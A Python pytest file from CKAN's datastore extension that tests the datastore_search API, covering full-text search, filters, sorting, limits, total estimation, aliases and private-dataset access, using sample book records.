| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
0a6f1707341f08e50621a8059a817b5a455fcc83
| 75,843
|
py
|
Python
|
ckanext/datastore/tests/test_search.py
|
shubhamsharma10/ckan
|
08a8c31970ad9f58265aeaae53157058dba2e5a3
|
[
"Apache-2.0"
] | 1
|
2021-03-20T20:45:04.000Z
|
2021-03-20T20:45:04.000Z
|
ckanext/datastore/tests/test_search.py
|
shubhamsharma10/ckan
|
08a8c31970ad9f58265aeaae53157058dba2e5a3
|
[
"Apache-2.0"
] | null | null | null |
ckanext/datastore/tests/test_search.py
|
shubhamsharma10/ckan
|
08a8c31970ad9f58265aeaae53157058dba2e5a3
|
[
"Apache-2.0"
] | 2
|
2019-03-06T11:24:13.000Z
|
2019-03-15T01:31:49.000Z
|
# encoding: utf-8
import json
import pytest
import sqlalchemy.orm as orm
import ckan.lib.create_test_data as ctd
import ckan.logic as logic
import ckan.model as model
import ckan.plugins as p
import ckan.tests.factories as factories
import ckan.tests.helpers as helpers
import ckan.tests.legacy as tests
import ckanext.datastore.backend.postgres as db
from ckanext.datastore.tests.helpers import extract
@pytest.mark.usefixtures("with_request_context")
class TestDatastoreSearch(object):
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_fts_on_field_calculates_ranks_only_on_that_specific_field(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [
{"from": "Brazil", "to": "Brazil"},
{"from": "Brazil", "to": "Italy"},
],
}
result = helpers.call_action("datastore_create", **data)
search_data = {
"resource_id": resource["id"],
"fields": "from, rank from",
"q": {"from": "Brazil"},
}
result = helpers.call_action("datastore_search", **search_data)
ranks = [r["rank from"] for r in result["records"]]
assert len(result["records"]) == 2
assert len(set(ranks)) == 1
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_fts_works_on_non_textual_fields(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [
{"from": "Brazil", "year": {"foo": 2014}},
{"from": "Brazil", "year": {"foo": 1986}},
],
}
result = helpers.call_action("datastore_create", **data)
search_data = {
"resource_id": resource["id"],
"fields": "year",
"plain": False,
"q": {"year": "20:*"},
}
result = helpers.call_action("datastore_search", **search_data)
assert len(result["records"]) == 1
assert result["records"][0]["year"] == {"foo": 2014}
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_all_params_work_with_fields_with_whitespaces(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 2014}, {"the year": 2013}],
}
result = helpers.call_action("datastore_create", **data)
search_data = {
"resource_id": resource["id"],
"fields": "the year",
"sort": "the year",
"filters": {"the year": 2013},
"q": {"the year": "2013"},
}
result = helpers.call_action("datastore_search", **search_data)
result_years = [r["the year"] for r in result["records"]]
assert result_years == [2013]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_total(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 2014}, {"the year": 2013}],
}
result = helpers.call_action("datastore_create", **data)
search_data = {"resource_id": resource["id"], "include_total": True}
result = helpers.call_action("datastore_search", **search_data)
assert result["total"] == 2
assert not (result.get("total_was_estimated"))
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_without_total(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 2014}, {"the year": 2013}],
}
result = helpers.call_action("datastore_create", **data)
search_data = {"resource_id": resource["id"], "include_total": False}
result = helpers.call_action("datastore_search", **search_data)
assert "total" not in result
assert "total_was_estimated" not in result
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_estimate_total(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 1900 + i} for i in range(100)],
}
result = helpers.call_action("datastore_create", **data)
analyze_sql = """
ANALYZE "{resource}";
""".format(
resource=resource["id"]
)
db.get_write_engine().execute(analyze_sql)
search_data = {
"resource_id": resource["id"],
"total_estimation_threshold": 50,
}
result = helpers.call_action("datastore_search", **search_data)
assert result.get("total_was_estimated")
assert 95 < result["total"] < 105, result["total"]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_estimate_total_with_filters(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 1900 + i} for i in range(3)] * 10,
}
result = helpers.call_action("datastore_create", **data)
analyze_sql = """
ANALYZE "{resource}";
""".format(
resource=resource["id"]
)
db.get_write_engine().execute(analyze_sql)
search_data = {
"resource_id": resource["id"],
"filters": {u"the year": 1901},
"total_estimation_threshold": 5,
}
result = helpers.call_action("datastore_search", **search_data)
assert result["total"] == 10
# estimation is not compatible with filters
assert not (result.get("total_was_estimated"))
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_estimate_total_with_distinct(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 1900 + i} for i in range(3)] * 10,
}
result = helpers.call_action("datastore_create", **data)
analyze_sql = """
ANALYZE "{resource}";
""".format(
resource=resource["id"]
)
db.get_write_engine().execute(analyze_sql)
search_data = {
"resource_id": resource["id"],
"fields": ["the year"],
"distinct": True,
"total_estimation_threshold": 1,
}
result = helpers.call_action("datastore_search", **search_data)
assert result["total"] == 3
# estimation is not compatible with distinct
assert not (result.get("total_was_estimated"))
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_estimate_total_where_analyze_is_not_already_done(self):
# ANALYSE is done by latest datapusher/xloader, but need to cope in
# if tables created in other ways which may not have had an ANALYSE
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 1900 + i} for i in range(100)],
}
result = helpers.call_action("datastore_create", **data)
search_data = {
"resource_id": resource["id"],
"total_estimation_threshold": 50,
}
result = helpers.call_action("datastore_search", **search_data)
assert result.get("total_was_estimated")
assert 95 < result["total"] < 105, result["total"]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_estimate_total_with_zero_threshold(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 1900 + i} for i in range(100)],
}
result = helpers.call_action("datastore_create", **data)
analyze_sql = """
ANALYZE "{resource}";
""".format(
resource=resource["id"]
)
db.get_write_engine().execute(analyze_sql)
search_data = {
"resource_id": resource["id"],
"total_estimation_threshold": 0,
}
result = helpers.call_action("datastore_search", **search_data)
# threshold of 0 means always estimate
assert result.get("total_was_estimated")
assert 95 < result["total"] < 105, result["total"]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_estimate_total_off(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 1900 + i} for i in range(100)],
}
result = helpers.call_action("datastore_create", **data)
analyze_sql = """
ANALYZE "{resource}";
""".format(
resource=resource["id"]
)
db.get_write_engine().execute(analyze_sql)
search_data = {
"resource_id": resource["id"],
"total_estimation_threshold": None,
}
result = helpers.call_action("datastore_search", **search_data)
# threshold of None means don't estimate
assert not (result.get("total_was_estimated"))
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_estimate_total_default_off(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 1900 + i} for i in range(100)],
}
result = helpers.call_action("datastore_create", **data)
analyze_sql = """
ANALYZE "{resource}";
""".format(
resource=resource["id"]
)
db.get_write_engine().execute(analyze_sql)
search_data = {
"resource_id": resource["id"],
# don't specify total_estimation_threshold
}
result = helpers.call_action("datastore_search", **search_data)
# default threshold is None, meaning don't estimate
assert not (result.get("total_was_estimated"))
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_limit(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 2014}, {"the year": 2013}],
}
result = helpers.call_action("datastore_create", **data)
search_data = {"resource_id": resource["id"], "limit": 1}
result = helpers.call_action("datastore_search", **search_data)
assert result["total"] == 2
assert result["records"] == [{u"the year": 2014, u"_id": 1}]
assert result["limit"] == 1
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_limit_invalid(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 2014}, {"the year": 2013}],
}
helpers.call_action("datastore_create", **data)
search_data = {"resource_id": resource["id"], "limit": "bad"}
with pytest.raises(logic.ValidationError, match="Invalid integer"):
helpers.call_action("datastore_search", **search_data)
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_limit_invalid_negative(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 2014}, {"the year": 2013}],
}
helpers.call_action("datastore_create", **data)
search_data = {"resource_id": resource["id"], "limit": -1}
with pytest.raises(
logic.ValidationError, match="Must be a natural number"
):
helpers.call_action("datastore_search", **search_data)
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
@pytest.mark.ckan_config("ckan.datastore.search.rows_default", "1")
def test_search_limit_config_default(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 2014}, {"the year": 2013}],
}
result = helpers.call_action("datastore_create", **data)
search_data = {
"resource_id": resource["id"],
# limit not specified - leaving to the configured default of 1
}
result = helpers.call_action("datastore_search", **search_data)
assert result["total"] == 2
assert result["records"] == [{u"the year": 2014, u"_id": 1}]
assert result["limit"] == 1
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
@pytest.mark.ckan_config("ckan.datastore.search.rows_default", "1")
def test_search_limit_config(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [
{"the year": 2015},
{"the year": 2014},
{"the year": 2013},
],
}
result = helpers.call_action("datastore_create", **data)
search_data = {
"resource_id": resource["id"],
"limit": 2, # specified limit overrides the rows_default
}
result = helpers.call_action("datastore_search", **search_data)
assert result["total"] == 3
assert result["records"] == [
{u"the year": 2015, u"_id": 1},
{u"the year": 2014, u"_id": 2},
]
assert result["limit"] == 2
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
@pytest.mark.ckan_config("ckan.datastore.search.rows_max", "1")
def test_search_limit_config_max(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 2014}, {"the year": 2013}],
}
result = helpers.call_action("datastore_create", **data)
search_data = {
"resource_id": resource["id"],
# limit not specified - leaving to the configured default of 1
}
result = helpers.call_action("datastore_search", **search_data)
assert result["total"] == 2
assert result["records"] == [{u"the year": 2014, u"_id": 1}]
assert result["limit"] == 1
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
@pytest.mark.ckan_config("ckan.datastore.search.rows_default", "1")
@pytest.mark.ckan_config("ckan.datastore.search.rows_max", "2")
def test_search_limit_config_combination(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [
{"the year": 2016},
{"the year": 2015},
{"the year": 2014},
{"the year": 2013},
],
}
result = helpers.call_action("datastore_create", **data)
search_data = {
"resource_id": resource["id"],
"limit": 3, # ignored because it is above rows_max
}
result = helpers.call_action("datastore_search", **search_data)
assert result["total"] == 4
# returns 2 records,
# ignoring the rows_default because we specified limit
# but limit is more than rows_max so rows_max=2 wins
assert result["records"] == [
{u"the year": 2016, u"_id": 1},
{u"the year": 2015, u"_id": 2},
]
assert result["limit"] == 2
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_filter_with_percent_in_column_name(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"primary_key": "id",
"fields": [
{"id": "id", "type": "text"},
{"id": "bo%ok", "type": "text"},
{"id": "author", "type": "text"},
],
"records": [{"id": "1%", "bo%ok": u"El Nino", "author": "Torres"}],
}
helpers.call_action("datastore_create", **data)
search_data = {
"resource_id": resource["id"],
"filters": {u"bo%ok": "El Nino"},
}
result = helpers.call_action("datastore_search", **search_data)
assert result["total"] == 1
@pytest.mark.usefixtures("with_request_context")
class TestDatastoreSearchLegacyTests(object):
sysadmin_user = None
normal_user = None
@pytest.fixture(autouse=True)
def initial_data(self, clean_datastore, app):
ctd.CreateTestData.create()
self.sysadmin_user = model.User.get("testsysadmin")
self.normal_user = model.User.get("annafan")
self.dataset = model.Package.get("annakarenina")
self.resource = self.dataset.resources[0]
self.data = {
"resource_id": self.resource.id,
"force": True,
"aliases": "books3",
"fields": [
{"id": u"b\xfck", "type": "text"},
{"id": "author", "type": "text"},
{"id": "published"},
{"id": u"characters", u"type": u"_text"},
{"id": "rating with %"},
],
"records": [
{
u"b\xfck": "annakarenina",
"author": "tolstoy",
"published": "2005-03-01",
"nested": ["b", {"moo": "moo"}],
u"characters": [u"Princess Anna", u"Sergius"],
"rating with %": "60%",
},
{
u"b\xfck": "warandpeace",
"author": "tolstoy",
"nested": {"a": "b"},
"rating with %": "99%",
},
],
}
auth = {"Authorization": str(self.sysadmin_user.apikey)}
res = app.post(
"/api/action/datastore_create", json=self.data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
# Make an organization, because private datasets must belong to one.
self.organization = tests.call_action_api(
app,
"organization_create",
name="test_org",
apikey=self.sysadmin_user.apikey,
)
self.expected_records = [
{
u"published": u"2005-03-01T00:00:00",
u"_id": 1,
u"nested": [u"b", {u"moo": u"moo"}],
u"b\xfck": u"annakarenina",
u"author": u"tolstoy",
u"characters": [u"Princess Anna", u"Sergius"],
u"rating with %": u"60%",
},
{
u"published": None,
u"_id": 2,
u"nested": {u"a": u"b"},
u"b\xfck": u"warandpeace",
u"author": u"tolstoy",
u"characters": None,
u"rating with %": u"99%",
},
]
engine = db.get_write_engine()
self.Session = orm.scoped_session(orm.sessionmaker(bind=engine))
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_basic(self, app):
data = {"resource_id": self.data["resource_id"]}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == len(self.data["records"])
assert result["records"] == self.expected_records, result["records"]
# search with parameter id should yield the same results
data = {"id": self.data["resource_id"]}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == len(self.data["records"])
assert result["records"] == self.expected_records, result["records"]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_private_dataset(self, app):
group = self.dataset.get_groups()[0]
context = {
"user": self.sysadmin_user.name,
"ignore_auth": True,
"model": model,
}
package = p.toolkit.get_action("package_create")(
context,
{
"name": "privatedataset",
"private": True,
"owner_org": self.organization["id"],
"groups": [{"id": group.id}],
},
)
resource = p.toolkit.get_action("resource_create")(
context,
{
"name": "privateresource",
"url": "https://www.example.com/",
"package_id": package["id"],
},
)
helpers.call_action("datastore_create", resource_id=resource["id"], force=True)
data = {"resource_id": resource["id"]}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_alias(self, app):
data = {"resource_id": self.data["aliases"]}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict_alias = json.loads(res.data)
result = res_dict_alias["result"]
assert result["total"] == len(self.data["records"])
assert result["records"] == self.expected_records, result["records"]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_invalid_field(self, app):
data = {
"resource_id": self.data["resource_id"],
"fields": [{"id": "bad"}],
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_fields(self, app):
data = {"resource_id": self.data["resource_id"], "fields": [u"b\xfck"]}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == len(self.data["records"])
assert result["records"] == [
{u"b\xfck": "annakarenina"},
{u"b\xfck": "warandpeace"},
], result["records"]
data = {
"resource_id": self.data["resource_id"],
"fields": u"b\xfck, author",
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == len(self.data["records"])
assert result["records"] == [
{u"b\xfck": "annakarenina", "author": "tolstoy"},
{u"b\xfck": "warandpeace", "author": "tolstoy"},
], result["records"]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_distinct(self, app):
data = {
"resource_id": self.data["resource_id"],
"fields": [u"author"],
"distinct": True,
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == 1
assert result["records"] == [{u"author": "tolstoy"}], result["records"]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_filters(self, app):
data = {
"resource_id": self.data["resource_id"],
"filters": {u"b\xfck": "annakarenina"},
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == 1
assert result["records"] == [self.expected_records[0]]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_filter_array_field(self, app):
data = {
"resource_id": self.data["resource_id"],
"filters": {u"characters": [u"Princess Anna", u"Sergius"]},
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == 1
assert result["records"] == [self.expected_records[0]]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_multiple_filters_on_same_field(self, app):
data = {
"resource_id": self.data["resource_id"],
"filters": {u"b\xfck": [u"annakarenina", u"warandpeace"]},
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == 2
assert result["records"] == self.expected_records
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_filter_normal_field_passing_multiple_values_in_array(
self, app
):
data = {
"resource_id": self.data["resource_id"],
"filters": {u"b\xfck": [u"annakarenina", u"warandpeace"]},
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == 2
assert result["records"] == self.expected_records, result["records"]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_filters_get(self, app):
filters = {u"b\xfck": "annakarenina"}
res = app.get(
"/api/action/datastore_search?resource_id={0}&filters={1}".format(
self.data["resource_id"], json.dumps(filters)
)
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == 1
assert result["records"] == [self.expected_records[0]]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_invalid_filter(self, app):
data = {
"resource_id": self.data["resource_id"],
# invalid because author is not a numeric field
"filters": {u"author": 42},
}
auth = {"Authorization": str(self.sysadmin_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_sort(self, app):
data = {
"resource_id": self.data["resource_id"],
"sort": u"b\xfck asc, author desc",
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == 2
assert result["records"] == self.expected_records, result["records"]
data = {
"resource_id": self.data["resource_id"],
"sort": [u"b\xfck desc", '"author" asc'],
}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == 2
assert result["records"] == self.expected_records[::-1]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_invalid(self, app):
data = {
"resource_id": self.data["resource_id"],
"sort": u"f\xfc\xfc asc",
}
auth = {"Authorization": str(self.sysadmin_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
error_msg = res_dict["error"]["sort"][0]
assert (
u"f\xfc\xfc" in error_msg
), 'Expected "{0}" to contain "{1}"'.format(error_msg, u"f\xfc\xfc")
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_offset(self, app):
data = {
"resource_id": self.data["resource_id"],
"limit": 1,
"offset": 1,
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == 2
assert result["records"] == [self.expected_records[1]]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_invalid_offset(self, app):
data = {"resource_id": self.data["resource_id"], "offset": "bad"}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
data = {"resource_id": self.data["resource_id"], "offset": -1}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_full_text(self, app):
data = {"resource_id": self.data["resource_id"], "q": "annakarenina"}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == 1
results = [
extract(
result["records"][0],
[
u"_id",
u"author",
u"b\xfck",
u"nested",
u"published",
u"characters",
u"rating with %",
],
)
]
assert results == [self.expected_records[0]], results["records"]
data = {"resource_id": self.data["resource_id"], "q": "tolstoy"}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == 2
results = [
extract(
record,
[
u"_id",
u"author",
u"b\xfck",
u"nested",
u"published",
u"characters",
u"rating with %",
],
)
for record in result["records"]
]
assert results == self.expected_records, result["records"]
expected_fields = [
{u"type": u"int", u"id": u"_id"},
{u"type": u"text", u"id": u"b\xfck"},
{u"type": u"text", u"id": u"author"},
{u"type": u"timestamp", u"id": u"published"},
{u"type": u"json", u"id": u"nested"},
]
for field in expected_fields:
assert field in result["fields"]
# test multiple word queries (connected with and)
data = {
"resource_id": self.data["resource_id"],
"plain": True,
"q": "tolstoy annakarenina",
}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == 1
results = [
extract(
result["records"][0],
[
u"_id",
u"author",
u"b\xfck",
u"nested",
u"published",
u"characters",
u"rating with %",
],
)
]
assert results == [self.expected_records[0]], results["records"]
for field in expected_fields:
assert field in result["fields"], field
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_full_text_on_specific_column(self, app):
data = {
"resource_id": self.data["resource_id"],
"q": {u"b\xfck": "annakarenina"},
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
assert len(res_dict["result"]["records"]) == 1
assert (
res_dict["result"]["records"][0]["_id"]
== self.expected_records[0]["_id"]
)
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_full_text_on_specific_column_even_if_q_is_a_json_string(
self, app
):
data = {
"resource_id": self.data["resource_id"],
"q": u'{"b\xfck": "annakarenina"}',
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
assert len(res_dict["result"]["records"]) == 1
assert (
res_dict["result"]["records"][0]["_id"]
== self.expected_records[0]["_id"]
)
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_full_text_invalid_field_name(self, app):
data = {
"resource_id": self.data["resource_id"],
"q": {"invalid_field_name": "value"},
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_full_text_invalid_field_value(self, app):
data = {
"resource_id": self.data["resource_id"],
"q": {"author": ["invalid", "value"]},
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_table_metadata(self, app):
data = {"resource_id": "_table_metadata"}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_is_unsuccessful_when_called_with_filters_not_as_dict(
self, app
):
data = {
"resource_id": self.data["resource_id"],
"filters": "the-filter",
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
assert res_dict["error"].get("filters") is not None, res_dict["error"]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_is_unsuccessful_when_called_with_invalid_filters(
self, app
):
data = {
"resource_id": self.data["resource_id"],
"filters": {"invalid-column-name": "value"},
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
assert res_dict["error"].get("filters") is not None, res_dict["error"]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_is_unsuccessful_when_called_with_invalid_fields(self, app):
data = {
"resource_id": self.data["resource_id"],
"fields": ["invalid-column-name"],
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
